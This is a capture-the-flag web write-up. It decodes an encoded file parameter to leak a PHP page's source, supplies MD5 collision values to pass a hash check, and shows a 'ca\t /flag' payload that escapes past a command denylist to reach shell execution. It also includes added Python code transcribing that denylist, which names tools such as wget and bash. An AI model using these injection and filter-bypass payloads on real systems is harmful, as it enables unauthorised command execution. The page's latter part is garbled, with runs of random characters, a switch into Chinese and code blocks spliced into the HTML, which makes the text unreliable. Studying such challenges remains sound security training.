<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>Opening the challenge gives the URL ?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd= ; I also viewed the page source.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>There is an "MD5 is funny" here, which suggests the challenge most likely has something to do with MD5.</p>
<p>I then captured the request; there was nothing special in the headers, so I tried starting from the URL.</p>
<p>First, base64-decode that value once.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>After one round it still looks like base64, so decode it again.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>Then hex-decode the result, which gives</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
</pre>
</div>
<p>Apply the same transformation in reverse to encode index.php:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
</div>
<p>Then put that value into the address bar.</p>
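<p>The decode/encode chain above, written out as an added Python example (it is not code from the original post or from the challenge). It reverses the server's img parameter in three steps (base64, base64, hex), applies the chain forwards to a filename, and mirrors the follow-up sanitisation the source applies to the decoded name. The only assumption is that PHP's non-strict base64_decode tolerates the missing "=" padding seen in the URL, which the helper emulates by re-padding.</p>

```python
import base64
import binascii
import re

# Taken from the challenge URL quoted on the page: img=TXpVek5UTTFNbVUzTURabE5qYz0
IMG_PARAM = "TXpVek5UTTFNbVUzTURabE5qYz0"


def _lenient_b64decode(s) -> bytes:
    """PHP's base64_decode() (non-strict) accepts input without '=' padding;
    re-pad so Python's decoder behaves the same way."""
    if isinstance(s, bytes):
        s = s.decode("ascii")
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_img(param: str) -> str:
    """Reverse the server's chain: base64 -> base64 -> hex -> filename."""
    inner = _lenient_b64decode(param)          # b"MzUzNTM1MmU3MDZlNjc="
    hex_text = _lenient_b64decode(inner)        # b"3535352e706e67"
    return binascii.unhexlify(hex_text).decode("ascii")


def encode_img(filename: str) -> str:
    """Apply the chain forwards: filename -> hex -> base64 -> base64."""
    hex_text = binascii.hexlify(filename.encode("ascii"))
    once = base64.b64encode(hex_text)
    return base64.b64encode(once).decode("ascii")


def sanitize_filename(name: str):
    """Mirror of what the server does with the decoded name: keep only
    [a-zA-Z0-9.] (so '/' never survives, which confines reads to the
    script's own directory) and refuse any name containing 'flag'
    in any letter case. Returns None when the name is refused."""
    name = re.sub(r"[^a-zA-Z0-9.]+", "", name)
    if re.search(r"flag", name, re.I):
        return None
    return name


if __name__ == "__main__":
    print(decode_img(IMG_PARAM))          # 555.png
    print(encode_img("index.php"))        # TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
    print(sanitize_filename("a/b.png"))   # ab.png
```

The round trip decode_img(encode_img(x)) == x holds for any ASCII filename, so the same two functions cover every value the page feeds through this parameter.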
<p>Then view the page source again and decode the base64 string it contains, which yields the PHP source:</p>
<div class="cnblogs_code">
<pre>&lt;?php
// Note: E_ALL || ~E_NOTICE is a boolean OR, so it evaluates to true (1 = E_ERROR)
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=');
// img is decoded base64 -&gt; base64 -&gt; hex to obtain a filename
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

// only letters, digits and '.' survive; any name containing "flag" is refused
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '&lt;img src ="./ctf3.jpeg"&gt;';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "&lt;img src='data:image/gif;base64," . $txt . "'&gt;&lt;/img&gt;";
    echo "&lt;br&gt;";
}
echo $cmd;
echo "&lt;br&gt;";
// denylist of command names and shell metacharacters applied to cmd
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", $cmd)) {
    echo("forbid ~");
    echo "&lt;br&gt;";
} else {
    // MD5 gate: a and b must differ as strings but have identical MD5 digests
    if ((string)$_POST['a'] !== (string)$_POST['b'] &amp;&amp; md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;   // cmd is executed by the shell via backticks
    } else {
        echo ("md5 is funny ~");
    }
}
?&gt;
&lt;html&gt;
&lt;style&gt;
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
&lt;/style&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
</div>
<p>Combined with the earlier inference, the key code is:</p>
<div class="cnblogs_code">
<pre>if ((string)$_POST['a'] !== (string)$_POST['b'] &amp;&amp; md5($_POST['a']) === md5($_POST['b'])) {
    echo `$cmd`;
} else {
    echo ("md5 is funny ~");
}</pre>
</div>
<p>This MD5 check calls for an MD5 strong collision: two values that differ as strings but have byte-identical MD5 digests, since the comparison uses ===.</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a24
</pre>
</div>
<p>With that alone, whatever is in cmd gets treated as a command.</p>
5 z1 {, [! k: P. o2 b) q5 D4 g<p>于是采用payload:</p>
* R, M! A j F$ G! G& f3 I: d% d<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>9 i' W1 h, E, W" x4 w+ ?0 y
<p> </p>7 E. p: |# i1 M$ g2 m8 V
<p> 因为'\'并没有被屏蔽所以可以这么绕过</p>4 E9 s, m( p: C/ q5 y( w
<p>ls和l\s在命令执行的时候结果是一样的。</p>
0 d' w. e: S* [<p>然后发现根目录里面有/flag</p>+ {! M d* D. a) p2 o- p
<p>于是payload:</p>
% J5 _ j7 V; j; F& I<div class="cnblogs_Highlighter">
4 e7 t4 B$ ], R6 @<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
/ f2 `# w0 e6 ^. L" |( _% Y</pre>) f6 y! A: I& l
</div>$ J3 A4 J7 C6 p5 I# L
<p> 对于这个题目,因为他没有屏蔽sort和dir</p>
* J+ u3 r* e- s4 r' ]! I5 r<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>% j& o! g/ Z( \0 L3 [3 H7 [
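<p>As an added example (mine, not the post's or the challenge's code), the page's denylist transcribed to Python and run over the command strings the page itself mentions, next to the control a defender would use instead. The transcription follows my reading of PHP double-quote escaping ("\\" becomes one backslash, "\n", "\t", "\r" and "\xA0" become control characters), so a lone backslash is not among the alternatives; the allowlist of command words is constructed for illustration.</p>

```python
import re
import shlex

# The page's preg_match denylist after PHP's double-quote escaping is applied
# (assumption: this transcription is mine, not the page's).
DENYLIST = re.compile(
    r"ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|"
    r"pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\|\\|\n|\t|\r|\xA0|\{|\}|"
    r"\(|\)|\&[^\d]|@|\||\$|\[|\]|{|}|\(|\)|-|<|>",
    re.I,
)

# Constructed allowlist of the only command words the endpoint should ever run.
ALLOWED_COMMANDS = {"uptime", "whoami"}


def denylist_allows(cmd: str) -> bool:
    """True when the page's filter lets cmd through to the backtick execution.
    It matches the raw text, before the shell strips backslashes, which is why
    the escaped spellings the page mentions are not caught."""
    return DENYLIST.search(cmd) is None


def allowlist_allows(cmd: str) -> bool:
    """Defender's alternative: tokenise the way a POSIX shell would (so 'l\\s'
    is seen as 'ls'), then accept only a single pre-approved command word with
    no arguments. Anything else, including unbalanced quoting, is refused."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return False
    return len(argv) == 1 and argv[0] in ALLOWED_COMMANDS


def compare(cmds):
    """Return {cmd: (denylist_allows, allowlist_allows)} for a list of inputs."""
    return {c: (denylist_allows(c), allowlist_allows(c)) for c in cmds}


if __name__ == "__main__":
    # The spellings discussed on the page, plus one legitimate command.
    for cmd, (deny_ok, allow_ok) in compare(
        ["ls", "l\\s", "cat /flag", "ca\\t /flag", "dir", "sort /flag", "uptime"]
    ).items():
        print(f"{cmd!r:16} denylist passes={deny_ok!s:5} allowlist passes={allow_ok}")
```

The contrast is the point: every alternative spelling the page lists sails through the denylist, while the allowlist rejects all of them because it decides on the normalised command word rather than on substrings of the raw text. Not handing user input to a shell at all (execute a fixed argv with subprocess instead of backticks) removes the problem entirely.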